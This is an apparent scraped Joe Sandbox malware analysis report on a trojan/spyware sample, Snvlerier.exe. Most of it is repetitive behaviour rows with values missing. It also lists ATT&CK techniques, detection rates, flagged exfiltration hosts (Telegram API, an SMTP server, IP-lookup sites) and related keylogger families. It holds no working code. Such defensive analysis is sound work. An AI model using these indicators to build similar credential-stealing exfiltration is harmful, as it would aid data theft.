| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Code function: | 0_2_00405FF1 | |
| Source: | Code function: | 0_2_0040264F | |
| Source: | Code function: | 0_2_004055CA | |
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | API call chain: | graph_0-3352 | ||
| Source: | API call chain: | graph_0-3515 | ||
| Source: | Process information queried: | Jump to behavior | ||
Anti Debugging | |
|---|
| Source: | Thread information set: | Jump to behavior | ||
| Source: | Process queried: | Jump to behavior | ||
| Source: | Code function: | 1_2_0087D869 | |
| Source: | Code function: | 0_2_00406018 | |
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Process token adjusted: | Jump to behavior | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Process created / APC Queued / Resumed: | Jump to behavior | ||
| Source: | Thread APC queued: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 0_2_00405D0F | |
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File source: | ||
| Source: | File source: | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 131 Virtualization/Sandbox Evasion | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 8% | ReversingLabs | |||
| 27% | Virustotal | Browse |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 8% | ReversingLabs | |||
| 27% | Virustotal | Browse | ||
| 0% | Virustotal | Browse |
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 2% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 0% | Virustotal | Browse |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 4% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 2% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 15% | Virustotal | Browse | ||
| 0% | Virustotal | Browse | ||
| 14% | Virustotal | Browse | ||
| 1% | Virustotal | Browse | ||
| 18% | Virustotal | Browse | ||
| 7% | Virustotal | Browse |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 142.250.185.110 | true | false |
| unknown |
| drive.usercontent.google.com | 142.250.185.97 | true | false |
| unknown |
| reallyfreegeoip.org | 188.114.96.3 | true | true |
| unknown |
| smtp.ionos.es | 213.165.67.118 | true | true |
| unknown |
| api.telegram.org | 149.154.167.220 | true | true |
| unknown |
| checkip.dyndns.com | 193.122.130.0 | true | false |
| unknown |
| checkip.dyndns.org | unknown | unknown | true |
| unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | unknown | ||
| false |
| unknown | |
| false |
| unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | unknown | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | unknown | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | unknown | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | unknown | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | unknown | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false |
| unknown | ||
| false | unknown | |||
| false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true | |
| 188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true | |
| 193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
| 142.250.185.110 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
| 213.165.67.118 | smtp.ionos.es | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true | |
| 142.250.185.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
| Joe Sandbox version: | 41.0.0 Charoite |
| Analysis ID: | 1532989 |
| Start date and time: | 2024-10-14 09:10:20 +02:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 7m 22s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 8 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | Snvlerier.exe |
| Detection: | MAL |
| Classification: | mal100.troj.spyw.evad.winEXE@6/14@6/6 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target msiexec.exe, PID 7824 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 03:11:23 | API Interceptor | |
| 03:12:11 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 149.154.167.220 | Get hash | malicious | XWorm | Browse | ||
| Get hash | malicious | XWorm | Browse | |||
| Get hash | malicious | XWorm | Browse | |||
| Get hash | malicious | NoCry, XWorm | Browse | |||
| Get hash | malicious | Blank Grabber, XWorm | Browse | |||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| 188.114.96.3 | Get hash | malicious | Lokibot | Browse |
| |
| Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| smtp.ionos.es | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | AgentTesla | Browse |
| ||
| Get hash | malicious | AgentTesla | Browse |
| ||
| Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
| Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
| Get hash | malicious | AgentTesla | Browse |
| ||
| Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
| reallyfreegeoip.org | Get hash | malicious | Snake Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| checkip.dyndns.com | Get hash | malicious | Snake Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| api.telegram.org | Get hash | malicious | XWorm | Browse |
| |
| Get hash | malicious | XWorm | Browse |
| ||
| Get hash | malicious | XWorm | Browse |
| ||
| Get hash | malicious | NoCry, XWorm | Browse |
| ||
| Get hash | malicious | Blank Grabber, XWorm | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| TELEGRAMRU | Get hash | malicious | XWorm | Browse |
| |
| Get hash | malicious | XWorm | Browse |
| ||
| Get hash | malicious | XWorm | Browse |
| ||
| Get hash | malicious | NoCry, XWorm | Browse |
| ||
| Get hash | malicious | Blank Grabber, XWorm | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | LummaC | Browse |
| ||
| Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
| ONEANDONE-ASBrauerstrasse48DE | Get hash | malicious | FormBook | Browse |
| |
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | Azorult | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | FormBook | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| ORACLE-BMC-31898US | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Snake Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
| Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DarkTortilla, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| 3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | XWorm | Browse |
| ||
| Get hash | malicious | XWorm | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| 37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Vidar, Xmrig | Browse |
| |
| Get hash | malicious | AsyncRAT, XWorm | Browse |
| ||
| Get hash | malicious | Vidar | Browse |
| ||
| Get hash | malicious | Vidar | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| ||
| Get hash | malicious | LegionLoader | Browse |
| ||
| Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
|
⊘No context
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | modified |
| Size (bytes): | 14744 |
| Entropy (8bit): | 4.992175361088568 |
| Encrypted: | false |
